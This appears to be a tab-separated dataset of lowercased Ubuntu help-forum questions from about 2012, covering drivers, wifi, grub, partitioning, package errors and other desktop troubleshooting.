207472	installation using wubi froze after a network router reboot	i have used wubi installer to install ubuntu in windows . its download progress stopped in middle due to a network router reboot . my internet connection is fine now but the download progress stopped .
207475	how to reinstall a package	i am getting this while installing libebml3 : errors were encountered while processing : libebml3 : i386 error in function : dpkg : error processing libebml3 : i386 ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . how can i fix this ?
207476	ipv6 tunnels - any easy way to turn them on and off ?	i 've set up a tunnelbroker.net ( hurricane electric ) ipv6 tunnel from my laptop running 12.04 . works fine , and allows me to test the dual-stack configuration on my remote webservers etc . until native ipv6 is available on my isp . however , there are times when i do n't want the tunnel . for example if i 'm accessing something that requires an ipv4 address in my own country rather than the tunnelbroker tunnel endpoint , or if i 'm away from the local ipv4 tunnel endpoint , or if i simply want to test without ipv6 . is there a simple way to disable and then re-enable the ipv6 tunnel , without rebooting ? for context , here 's what 's in my /etc/network/interfaces ( nnn replaces numbers ) : auto he-ipv6 iface he-ipv6 inet6 v4tunnel endpoint 216.218.nnn.nnn address 2001:470 : nnn : nnn : :2 netmask 64 up ip -6 route add default dev he-ipv6 down ip -6 route del default dev he-ipv6 is there a network manager application ( gui or command line ) to selectively enable/disable parts of /etc/network/interfaces , or ipv6 in general ? i found even by commenting out that out ( and reloading networking ) it 's tough to get the ipv6 to go away . a `` tunnel on/off '' button in networking would be great , like using a vpn .
207482	wifi not working now . was working fine until yesterday	i have been running ubuntu 12.04 on my hp pavilion g6 notebook for 4 months now . there were no issues at all . today , i tried to connect using the wifi , it does n't turn on but bluetooth which is also integrated with the same key ( f12 ) turned on and it is working fine . there is light indicator ( red when wifi disabled ) on that f12 switch , it should become white when enabling the wifi but today it remained red though bluetooth got enabled . i tried following solution but it does not work . try to re-install the drivers by using : sudo apt-get remove bcmwl-kernel-source sudo apt-get install bcmwl-kernel-source i recently made a few changes , they are : installed matlab . updated kernel to 3.6.3 but rolled back to linux kernel 3.2 as my notebook failed to boot after upgrading the kernel . installed 0ad game . system info : product name : hp g6-1209ax product number : a3v45pa microprocessor : 2.3 ghz/1.4 ghz amd quad-core a6-3400m microprocessor cache : 4 mb l2 cache memory : 4 gb 1333 mhz ddr3 max memory : upgradeable to 8 gb ddr3 video graphics : amd radeon hd 6470m ( 1 gb ddr3 dedicated ) display : 15.6 '' high-definition led hp brightview display ( 1366 x 768 ) hard drive : 500 gb sata ( 5400 rpm ) multimedia drive : supermulti dvdâąr/rw with double layer support network card : integrated 10/100 base-t ethernet lan wireless connectivity : bluetooth 802.11 b/g/n sound : altec lansing speakers srs premium sound keyboard : notebook keyboard with home roll keys trackpad : touchpad supporting multi-touch gestures with on/off button pc card slots : multi-format digital media card reader for secure digital cards , multimedia cards and external ports : 3 usb 2.0 1 vga 1 rj-45 / ethernet 1 headphone out ( stereo ) 1 microphone-in dimensions 37.4 x 24.5 x 3.63 cm weight starting at 2.3 kg power 90w ac power adapter 6-cell lithium-ion ( li-ion ) any help or suggestions will be greatly appreciated !
207484	remove proprietary nvidia drivers ?	i manually installed the lastest nvidia drivers on ubuntu 12.10 using the files directly from the nvidia website . long story short , they do n't work , i have an extremely low resolution , and need to go back to nouveau . i can get to the terminal by re-logging in after holding down ctrl-alt-f1 , how do i purge the proprietary drivers and go back to nouveau ?
207491	i ca n't see my ink levels for my canon pixma ip2702 printer	i have a canon pixma ip2702 inkjet printer , and cups does n't show my ink levels , inkblot is no longer available on the interwebs and mtink doesn’t seem to support my printer , i’ve checked my printer 's website and none of the drivers support linux so what do i do now ?
207492	micromax mmx352g 3g usb modem not working in 12.10	whenever i plugged in the modem to 12.10 , i get an error message : ( system problem ) . when i look for the modem in the computer - there was an unknown device ( that is the modem ) . so i need a driver for that modem . i am not able to connect internet , but in 11.10 there was no problem . how can i fix this ?
207494	is it secure to run windows application on linux ?	i wanted to run windows applications on ubuntu . so i installed winehq . my question is that , is it secure to run windows applications on linux ? will my computer become vulnerable to virus ? ?
207495	how to get rid of these ppa	how to get rid of these ppa ? err http : //ppa.launchpad.net quantal/main sources 404 not found err http : // ppa.launchpad.net quantal/main i386 packages 404 not found ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
207499	question about ubuntu 12.10 extracting a .tgz file in the wrong directory	i installed the ubuntu 12.04 then i reinstalled ubuntu 12.10 ( the version along with window 7 ) when i was using ubuntu 12.04 , i typed ls to show what file are listed in directory ( included arm-linux-gcc-4.5.1-v6-vfp-20120301.tgz ) and the list show out the file that are needed to be extracted . and that i type sudo tar -zxvf arm-linux-gcc-4.5.1-v6-vfp-20120301.tgz -c / and file was extracted in the same directory with zip file and own by user . after i install ubuntu 12.10 redo the processes ls ( check file again ) sudo tar -zxvf arm-linux-gcc-4.5.1-v6-vfp-20120301.tgz -c / and the extracted file was in the file system and owned by root and adminstrator ca n't use it . what 's wrong ? ?
207501	my laptop wont boot from ubuntu installation disc	i just burned ubuntu 12.10 x64 to a dvd ( cd is too small ) and put it in my laptop . when i rebooted , there was a violet screen and that keyboard logo . and then a black screen with _ in top left corner . it wo n't let me write anything in it . i have hp pavilion g7 1303em . i already have windows 7 x64 on my laptop and i want to install ubuntu alongside windows .
207502	unable to change anything in nautilus	i recently installed gnome 3 and now i have found out that it has messed up with nautilus . the menu bar and the right click menu are completely devoid of options . also , the icons look different . how to get back the default nautilus ? i 'm using unity ( used gnome 3 for only a day ) . i have attached a screenshot . please help ! : )
207503	`` authentication service is not available '' when installing idle ( using python 2.7 )	i am getting this error installing idle on 12.10 : software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.95 ' } ) : org.debian.apt.install-or-remove-packages i ca n't install anything , even games . they all come up with the same error message . is there something i am missing ? please suggest .
207505	how to completely remove virtual packages ?	it turns out that removing a virtual package with apt-get only remove the package itself , leaving behind the real packages that were installed by it so how do you remove a virtual package , along with all the real packages that it installs ?
207510	can i lock screen after move mouse in lock screen ?	i lock my computer . accidentally the mouse moved . then the lock menu was shown by the computer . can i lock it without input the password and lock again ?
207512	how to fix : extension `` nv-glx '' missing on display . ubuntu running on oracle vm virtual box	i have been assigned a homework on my c++ class using opengl and glut . when i try to run the project , it runs very slowly and it freezes after a little bit . before the program runs i get the following error : extension `` nv-glx '' missing on display if have tried : installing the driver from nvidia website . installing the driver by following the instructions in this thread : extension `` glx '' missing on display installing/uninstalling the drivers several times . all of this without any success . i am not a linux expert , and this is my first time dealing with linux seriously , so if you could please set me in the right direction i would appreciate it . thanks .
207516	xubuntu 12.04 black screen on wake	in /var/log/suspend.log , all is a success or not applicable , except these lines : having networkmanager put all interaces to sleep ... failed . failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory having networkmanager wake interfaces back up ... failed . i 'm not sure that they are relevant , but i 'm stymied . i tried adjusting the brightness via keyboard , and also tried opening a terminal and commanding a shutdown , but neither worked , so it appears to not load properly at all , though the screen backlight is powered and the system is running . this is an hp pavillion dv7 notebook .
207521	internet through vpn does n't work in ubuntu 12,10	i installed ubuntu 12.10 on my g580 lenovo laptop . not everything but most of the things work fine . today i brought my laptop to university . here everyone has a pptp vpn account to connect to internet . i can connect to my vpn account successfully and ping websites but i can not open any webpage ! also i ca n't download anything from software center . everything works fine in windows and home wifi internet works ok . thanks alot .
207524	'trash : ' vs 'trash : / '	a accidentally removed the trash icon from dolphin , and created a new one , typing 'trash : ' for the location . but when i clicked on it it would show the trash folder , but the 'empty trash ' menu entry on the context menu was grayed out . when i changed the location to 'trash : / ' , it started working correctly , and 'empty trash ' was not grayed out anymore . so why is there a difference between 'trash : ' and 'trash : / ' ?
207527	wireless driver for ubuntu 12.10 32 bit on dell inspiron 5520	i have installed ubuntu 12.10 lately and i tried to install the wireless driver by seeing various sites and threads . i have installed a deb from here : how do i install bcm43142 wireless drivers for dell vostro 3460/3560 ? but it does n't have any effect on my system . i additional driver section i get using broadcom 802.11 linux sta wireless drivers source frm wireless-bcm43142-oneiric- dkms ( opensource ) but it also shows : this device is using an alternate driver . i have these results : sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 05 serial : d4 : be : d9:2d : d3:86 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk- napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : c1404000-c1404fff memory : c1400000- c1403fff *-network unclaimed description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c1500000-c1507fff and lspci -vvv 08:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 11 region 0 : memory at c1500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied >
207548	in trying to repair grub , i get an `` uncompression error system halted '' notice	i had ubuntu 12 .04 then installed windows . as usual , it wiped out my ubuntu 12.04 grub . so i tried using a live cd to repair grub . however , the cd never really load and after eternity it gives me an `` uncompression error system halted '' notice . note : my 12.04 was an upgrade from 11.10
207551	when mounting my hdd i get unable to mount location ''	i have replaced windows 8 with ubuntu 12.10 , and after installing i ca n't open hdd and i get this message unable to mount location i have very important files on my hhd therefore i ca n't formate it . what should i do to get to my harddrive ?
207552	`` no such file or directory '' when invoking java	i 'm trying to re-install oracle jdk 7 32 bit to 64 bit ubuntu ( previously 64 bit jdk was installed ) . jdk is currently present at /usr/lib/jvm/jdk1.7.0 . i invoke sudo update-alternatives -- remove `` java '' `` /usr/lib/jvm/jdk1.7.0/bin/java '' sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/jdk1.7.0/bin/java '' 1 and then : /usr/lib/jvm/jdk1.7.0/bin $ java bash : /usr/bin/java : no such file or directory why java ca n't be invoked ?
207561	check package revision history	i want to review which package versions have been available in repositories at certain date . for example i want to know for the 'dirvish ' package what subsequent versions have been available from repositories and what date that version was introduced . where can i find that information ?
207565	unable to boot : error could n't read file	i have installed ubuntu 12.04 lts on an ibm thinkpad t41 . up until linux 3.2.0-30 generic everything was working fine . i accept all the software update . with 3.2.0-31 generic the machine freezes and i get the error : error could n't read file kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) with 3.2.0-32 , the error : can not read the linux header then the machine returns to the grub menu 3.2.0-30 still works fine if i select that .
207567	can sender node receive own packet from hub network	i believe that the hubs rebroadcast any bit sent to it to all hosts , including the original sender . i want to receive packet on the sender node . is it possible in linux ? is it enough to add : net.ipv4.conf.eth0.rp_filter=0 net.ipv4.conf.eth0.accept_local=1 into sysctl.conf file ?
207568	every function key on laptop works except for brightness	i have an asus ux21a , and i 'm pleased to discover that almost all the hardware functions and features work perfectly with ubuntu 12.10 . the only thing that is not working straight `` out of the box '' are the brightness keys . in theory , the screen brightness can be adjusted downward by pressing fn+f5 , and adjusted upward by pressing fn+f6 . is there a way i can connect the monitor brightness settings to these function keys ?
207569	how do i connect a nexus 7 to transfer files ?	i want to move some files from my pc to nexus 7 . the tablet is connected to my pc 's usb port and it is successfully charging . unfortunately , the pc is not detecting the devices - what i expected is to be shown the nexus 7 tablet as external devices ( like my usb flash memory ) . as the tablet is connected to the my home internet network , i have checked if it will appear in the `` networks '' section but it does not . i am using ubuntu 12.04 lts . is there a easy way to connect the devices to my pc and move some information between them ?
207570	downloading ubuntu in windows through virtual box	i am installing ubuntu in windows through virtual box . when it finishes installing it asks for restart , its restarting and then asks again for installing . what shall i do ?
207571	windows not shown in grub after installing 12.10	i just installed 12.10 alongside windows 7 . i split my partition into two because disk reader during the installation did n't recognize windows 7 as being installed on the computer . it installed correctly and i restarted only to find out it was n't recognized in grub also and booted straight to ubuntu . i read this post and thought of using boot-repair would be fine but i gain this error : gpt detected . please create bios-boot partition ( > 1mb , unformed filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . i 've no idea what it means or what to do next . suggestions would be appreciated and i have lost my windows installation disk and i really do n't want to have to go looking for it . edit : this is what boot-repair came back with . http : //paste.ubuntu.com/1326230/
207573	how to enable smart ?	i want to conduct a smart test on my drive but it was disabled . so , i used sudo smartctl -s on /dev/sda but the result was smartctl 5.41 2011-06-09 r3365 [ i686-linux-3.2.0-26-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of enable/disable commands section === error smart enable failed : scsi error aborted command smartctl : smart enable failed . a mandatory smart command failed : exiting . to continue , add one or more '-t permissive ' options . how to overcome this problem ?
207577	how to install autodesk maya 2011 in ubuntu 12.04 ?	i am getting an error when i run the command maya in my terminal : usr/autodesk/maya2011-x64/bin/maya.bin : error while loading shared libraries : libtiff.so.3 : can not open shared object file : no such file or directory i followed the link for maya 2012 x64 on ubuntu 11.10 , but i got stuck at the final step . can you please guide me to install maya 2011 x64 on my 12.04 system ?
207578	do nvidia 's drivers work in 12.10 on a macbook pro ?	update : since this question has got many views , i just want to add that from ubuntu 13.04 onwards , proprietary drivers installed perfectly on my macbook . versions of ubuntu prior to 13.04 will have problems i recently upgraded to 12.10 and was just checking for proprietary drivers to be installed . i found this in software sources when i enabled nvidia binary xorg driver , unity disappears along with the launcher and everything . i just have the wallpaper . i did manage to open the terminal and open software sources and select the nouveau display driver which fixed it . question is how to enable nvidia binary xorg driver and have everything working ? hardware : apple macbook pro 9,1 mid 2012 15 inch non-retina . nvidia geforce gt650m edit : i tried the solution here . and now , when i boot into ubuntu , i get a blinking cursor . that 's all ! no tty1 , nothing . help ! ! edit 2 : i inserted the live usb and re installed ubuntu without formatting the partition . at least , i did n't lose my files , but all softwares are gone . and the output of lspci -vnn | grep '\ '' [ 030 [ 02 ] ] ' is 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0fd5 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) edit 3 : so , i was checking the link which shrinivas gave , namely this one http : //www.dedoimedo.com/computers/ubuntu-quetzal-nvidia.html and it does n't work for me . specifically , where he says to run the command modprobe nvidia_current , i get the output fatal : error inserting nvidia_current ( /lib/modules/3.5.0-22-generic/updates/dkms/nvidia_current.ko ) : operation not permitted so , what 's the problem ? to reiterate , i 'm using ubuntu on an apple macbook pro mid 2012 15 inch non retina 8gb ram with nvidia geforce gt650m
207579	what happened to my unity application ?	something is wrong when i try to search some applications in the dash . i do n't know how to describe it , but you can see it in the attached pictures : i 'm using unity 12.04 lts , with faenza icons , boomerang style . can anyone tell me how to fix/remove it ?
207580	`` the system is running in low graphics mode '' , unable to connect to the internet	when i try to log onto ubuntu , i get a notice that reads : the system is running in low graphics mode . i searched for a solution and there are a slew of answers . however , many of them seem to suggest reinstalling different things . after pressing ctrl+alt+f1 and getting to a terminal , i attempt commands like sudo apt-get install example . upon doing so i get notices that say things such as could not resolve host which i am assuming means i 'm not connected to the internet . since i can not connect to the internet , none of these responses are helpful to me . what can i do ?
207582	i accidentally deleted the settings manager	last time i played around with java on my laptop , and i accidentally removed the settings manager ( power settings , screen settings , and so on ) as well . so i did reinstall java , and i tried to find the package name on the internet without success . whats the package name of this ? thanks !
207585	wireless/bluetooth bcm4313 hardware blocked	i use dual boot win7/ubuntu 12.10 . when i turn off wireless from win7 ( fn+f8 ) , then wireless is not working in ubuntu . if i leave wireless turned on in win7 then , after restart , wireless works in ubuntu 12.10 . same thing happens for bluetooth . it is apparent that the bcm4313 wireless is not supported correctly in ubuntu . with rfkill list i can see that wireless is hard blocked and rfkill unblock all has no effect . what should i do to resolve the issue ?
207590	neither suspend nor hibernate in 12.10 lubuntu - is there a workaround by scripts ?	i 've neither suspend to ram nor to disk in 12.10 lubuntu ( i suspect there might be a kernel issue but i 'm only a simple user ) . also , the xfce powermanagement which comes with lubuntu by default does not have any effect . even it does n't lock the screen when i set this in the preferences : what do when close the lid . so , on a portable that 's annoying a lot . is there some way to workaround by scripts in etc/pm/*.d ? searching around i found something interesting in my syslog : laptop-mode : warning : configuration file /etc/laptop-mode/conf.d/board-specific/*.conf is not readable , skipping . and then : laptop-mode : enabled , not active the `` incriminated '' directory /board.specific/ , in my computer does simply not exist ! now , i do n't seem to be the only one affected by this problem . there is something like a bug filing against this in debian . may be , someone knows how to overcome this problem ?
207592	how to configure pidgin-sipe in empathy ?	i could n't find a way to add sipe to empathy in ubuntu 12.10 . i installed pidgin-sipe but i do n't see the protocol in the empathy list of protocols .
207599	how to manage colours of monitor ?	when i was on windows 7 there was a program : intel hd graphics control panel . my notebook : acer aspire 5750g integrated videocard : intel hd graphics discrete video card : nvidia 630m how can i manage colours on ubuntu 12.04 ? going to system - > color does n't work for me . i cant calibrate my display :
207603	moving files from external hdd to notebook does n't work	i 've copied a bunch of large media files to an external hdd connected via usb . when i try to put them back on my notebook hdd ( i open nautilus and move the files in f3-mode ) i get a lot of hickups and the process can never be finished for any file . something wrong with the external hdd ?
207604	bazaar - pull the last revision only ( and not the whole branch )	shortly : how can i take the latest revision ( only ) from a remote bazaar repository and add it as a new revision to a local repository . background : i have a development system and a production system . on a development system there 's a bazaar repository having branch with lots of development revisions . once in a while i want to incorporate the latest developments into production system . i want to do so by some sort of `` pulling '' ( development system can not connect to production for security reasons , but production can initiate connection to development ) . on the production , i do n't want the whole development revision history , only those revisions which actually go into production ( normally it 's the branch tip ) . yet i want version control on the production system to keep track of what actually goes into production each time . bzr pull pulls the whole branch . bzr pull -- revision=last:1 also pulls the whole branch , up to the specified revision . bzr merge -- pull -- revision=last:1 also pulls the whole branch . bzr merge -- pull -- revision=last:2..last:1 and bzr merge -- pull -- change=last:1 both pull only the new changes introduced in the latest revision , but not changes introduced in the older revisions . with lightweight checkout i have no track of revisions which are pulled into production - local working tree remains part of the remote repository the only way i see so far is importing the working tree using some rsync or scp and committing them to a local branch afterwards . any better ideas ?
207605	wireless speed drops over time and does n't get up if not reconnected on an asus pce-n15	i am using ubuntu 12.10 64bit and i have a asus pce-n15 wireless card ( in pci-e slot ) . the problem is that first when i connect to my wifi network the speed is just fine , and actually my link speed never drops , it shows a solid 150mb/s+ link speed and good signal . but the download and upload speeds drop dramatically after couple minutes of use and i have to reconnect to fix this . network is type ieee 802.11bgn and uses wpa2/aes encryption . i do n't have similar problems on the windows side , and the network is working fine on every other device . iwconfig shows this : wlan0 ieee 802.11bgn essid : '' wlan-ap '' mode : managed frequency:2.412 ghz access point : 00:1e : ab:05 : ef:31 bit rate=300 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off encryption key : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 so the question is : is there a way to fix this ? thanks in advance .
207607	bcm4313 wireless on ubuntu server 12.04	i 'm trying to run an old netbook with broadcom bcm4313 wireless as a print server with ubuntu server 12.04 . setting up the wireless without the gui , however , is proving problematic . i do think however i 've narrowed down the problem . i 've tried both the wl driver ( from bcmwl-kernel-source ) as well as the ( included ) brcmsmac driver . with both of them , when i issue the command iwlist wlan0 scanning ( eth1 for wl ) , i only see neighbouring networks- not my own . i believe this might be because my networks are n-only , but my neighbouring networks are mixed mode ( i suspect this because the output of iwlist wlan0 scanning shows `` bit rates '' only as high as 54 mb/s ) . any ideas how to go about getting this thing to connect ?
207609	i ca n't kill a port process	i 'm doing in ubuntu 12 alex @ ubuntu : ~/folder $ lsof -t -i:3000 4469 alex @ ubuntu : ~/folder $ kill 4469 alex @ ubuntu : ~/folder $ lsof -t -i:3000 4469 what did i do wrong ?
207612	how can i synchronize all pdfs from one directory with dropbox ?	i want to synchronize all the pdfs from one directory ( my zotero library ) to dropbox . finally , i want to have a list of all the pdfs , not the directory names . i successfully synchronized all my pdfs with the following command : rsync -az -- include= '' */ '' -- include= '' *.pdf '' -- exclude= '' * '' \ -- prune-empty-dirs /zotero /dropbox i think i can easily set up a cron job to redo that task every day , but have n't tried that yet . but now my folder on dropbox still has all the directories with the pdfs in it ( e.g . 6nvtacjh > xyz.pdf ) my problem : i would love to only have all the pdfs listed in one directory . following an advice from the web , i tried to find all pdfs and create a hardlink . but this command does not work yet . ln $ ( find -name= '' *.pdf '' -type f - links 1 ) /dropbox can you please help me with that last command ?
207617	problems with disk partitions ?	i use ubuntu 12.04 alongside with windows . now i want to resize my home drive ( i.e . /dev/sda7 ) . when i try to move my ntfs partitions gparted ( ver : 0.11.0 ) says that `` ca n't have overlapping partitions '' . please help me .
207624	do n't show gwibber messages in indicator applet	gwibber turns the indicator-applet-icon blue , each time a new tweet appears in my timeline , which is always . it is therefore no longer usefull as a `` there is a new message for you '' resulting in many missed jabber/gtalk chats , finding emails half an hour late and so on . how can i mute gwibber in there ? preferably so it only turns the new-message-icon blue on new replies and private messages in gwibber . but certainly not on any update .
207627	installing `` ia32-libs '' problem - ubuntu 12.10 x64	i 'm trying to install ia32-libs and i tried nearly all commands to install this package but always i got an error . here is what i 've tried so far ; sudo apt-get install ia32libs orkun @ ubuntu : ~ $ sudo apt-get install ia32libs [ sudo ] password for orkun : reading package lists ... done building dependency tree reading state information ... done n : ignoring file 'ferramroberto-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ferramroberto-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ferramroberto-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : unable to locate package ia32libs . sudo apt-get install package-name : i386 orkun @ ubuntu : ~ $ sudo apt-get install package-name : i386 reading package lists ... done building dependency tree reading state information ... done n : ignoring file 'ferramroberto-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ferramroberto-java-quantal.list.save ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : unable to locate package package-name . downloading this package and trying these commands ; sudo dpkg -i «package name > orkun @ ubuntu : ~/indirilenler $ sudo dpkg -i ia32-libs_20090808ubuntu36_amd64.deb ( reading database ... 151309 files and directories currently installed . ) preparing to replace ia32-libs 20090808ubuntu36 ( using ia32-libs_20090808ubuntu36_amd64.deb ) ... unpacking replacement ia32-libs ... dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . dpkg : error processing ia32-libs ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : ia32-libs
207629	resize root partition using uncontiguous free space	the partition table is looking this way : |ntfs|free-space|linux-boot|linux-extended| i want to resize ( make bigger ) my linux-extended partition ( actually the / partition inside it ) , to take the free-space . i noticed with gparted it is not possible just to resize this way . is it so , that ext4 does n't allow it ? i thought about this solution : extend linux-boot to the left , and shrink it from the right to the original size . than the same for the linux-boot partition , and finally just extend the linux-extend partition . question : after such a resize , will the data on all partitions remain uncorrupt ( will such a resize move also the files to the beginning ) ? are there any other options ?
207634	url in launcher	how do i get an url in unity launcher , so when i click the url the website of that url opens in my standard webbrowser - i.e . firefox . ( i am using ubuntu 12.10 )
207635	why are there no alternate cds ?	in trying to download the latest release , i see there are no alternate cds available . previously i have needed them in order to install with a linux software raid root . does the lack of alternate cds mean that all of those features are within the others ? or have they not been finished yet ? i ideally wanted a kubuntu alternate cd but i see there is not an ubuntu one either . thanks
207636	vdr service blocks standby	i have a problem with 12.04 . the standby function works only when i stop the vdr service with sudo service vdr stop . is there a possibility to solve the problem ?
207638	can only see icons that in the desktop . no global menu , no dash !	i just upgraded my 12.04 system to 12.10 , but only seem to be able to access the applications for which i had shortcuts on the desktop . no sidebar or global menu show up at all . i would be grateful for any assistance . cheers ,
207647	how do i uninstall or disable the entire dash in unity ?	i love using unity except for the dash . is it possible to uninstall or disable the dash ?
207648	deluge torrent downloads disorganized/reset after 12.10 upgrade	i upgraded to 12.10 today and noticed that the torrents i 'm seeding went to 0 % so i have to download it again . i checked deluge 's preferences and found that after the upgrade the downloads pathway went to 'juno ' folder when it should be on my 'torrent downloads ' . i had trouble resorting it back to 'torrent downloads ' because it kept going back to 'juno ' after clicking apply or ok although after several tries it 's now set to 'torrent downloads ' . i checked a single torrent and found in the options that its path is towards 'media ' . i 'd like to think this is towards my external hard drive which i direct all my torrent downloads to . all my completed downloads went back to 0 % . i tried rebooting my laptop but unlike before where deluge automatically re-checks completed files , now it 's downloading like it 's a newly added torrent . can i get back the '100 % completed ' status to some of torrents again ? eta : my torrent files are located in my hard drive but i direct my torrent downloads to my external hard drive . i did n't move my torrent files folder in my hard drive before or after my 12.10 upgrade .
207650	what interface toolkit is being recommended for ubuntu on nexus7/mobile devices ?	i understand this is a may be a very premature question given that the current build is for testing ubuntu core , but i have just bought a nexus7 to join in with this ubuntu on mobile adventure and ca n't help wanting to start writing some apps ! i have n't really dabbled with either gtk or qt for touch apps yet and , having seen that ubuntu tv is using nux , i wondered what people on askubuntu-land would recommend . hope someone out there know this ! cheers
207652	unable to connect via mobile broadband - but its detected - 12.10	previously ( on ubuntu 12.04 ) , i will just connect my 3g mobile broadband modem , and will start browsing after enabling it and going through the setup process . however , on the 12.10 , i 'm able to setup my connection , but it does n't connect to the internet . all settings are okay . i 've tried two different network providers in ghana , still , i 'm not able to connect . at times , i 'm notified that , its connected to the `` home network '' of the service provider , but disconnects in less than 10 seconds . is it supposed to be a bug ? i 've been reading about the wvdial , but i 'm wondering something that used to be possible by `` default '' in ubuntu should now be `` configured '' via a software . help !
207658	i want to use windows 8 from within ubuntu	i have windows 8 cd . i bought a laptop which has a windows 7 os but i removed it to use ubuntu 12.04 but for some of the programs i need windows 8 without separate partitions . i heard about vmware and how it can help to run the os inside another . as i have only allocated 50gb for ubuntu 12.04 64bit , which i am using right now , i want to use windows 8 from within my ubuntu 12.04 . could anyone help ?
207660	is it legal to use fonts downloaded by winetricks ?	if i run winetricks then select the default wine prefix then select install a font , i find some fonts . is it legal to use this fonts ? especially microsoft fonts such as tahoma ?
207662	how to setup an ubuntu server ?	i have no knowledge when it comes to servers and i really want to be a pro at stuff like that . what i wan na do is setup a ubuntu server like in schools you get a username and a password and then you can log into your account from any computer in the school and still have those files you have on your user . is there any easy way to setup a ubuntu server like that ? or could someone give me a step by step tutorial ? i have a spare computer that i can use as a server
207663	can not update grub with paramters on live usb	i have booted from a live usb ( `` try ubuntu '' ) , that also has a persistent option set ( i used lili to create one ) to do some tests for this pcie hotplug issue i 'm having . i 'm trying to test some boot paramaters ( like in this question ) by doing this sudo nano /etc/default/grub sudo update-grub the problem is that that last command gives me this : /usr/sbin/grub-probe : error : failed to get canonical path of /cow . it looks like /cow is the file-system that is mounted on / , according to : : ~ # df filesystem 1k-blocks used available use % mounted on /cow 4056896 2840204 1007284 74 % / udev 1525912 4 1525908 1 % /dev tmpfs 613768 844 612924 1 % /run ... . is there a way for me to run update-grub ?
207668	12.10 , only one speaker is working	it worked normal one day , but then i turned the computer on , and suddenly only one the left speaker works . headphones work normally .
207670	update manager failed to download repository information+	whenever i try to cheek for updates the following error turns up : w : failed to fetch http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/sun-java-community-team/sun-java6/ubuntu/dists/precise/main/binary-amd64/packages 404 not found
207673	how to fix inverted video on skype ?	i just installed 12.10 on my lenovo y510 laptop . the webcam worked fine while setting up ubuntu , it also works fine with google chat and cheese . but with skype 4 , the video is inverted 180 degrees . i did n't see any options within skype to fix it . how can i fix this ?
207675	ubuntu 12.04 network manager : unable to save manual setting to set up a static ip	i am fairly familiar with setting up servers , and ubuntu is generally my flavor of choice , but i just installed 12.04 desktop and i am seeing some behavior in network manager that is really puzzling . the network connection works fine if i leave it set on dhcp , but i would like a static ip address for my new web server . when i go into network manager and edit the connection for the one and only nic i can select manual from the dropdown menu but as soon as i do the save button becomes greyed out . even after filling out all fields for the connection it is still grey and i am unable to save the static ip connection information . any thoughts would be greatly appreciated . i 'm hoping there is just some new setting that i am unaware of ... . on another note , if i stop the network manager and go edit the interfaces file ( and the appropriate hosts/routes/dns files ) , i do get a static ip address assigned and i can contact my server from the outside , however , the server can not find the internet . ca n't ping even its own ip ... i can ping the loopback interface though . i 'm really confused on this one . hoping someone can offer some help .
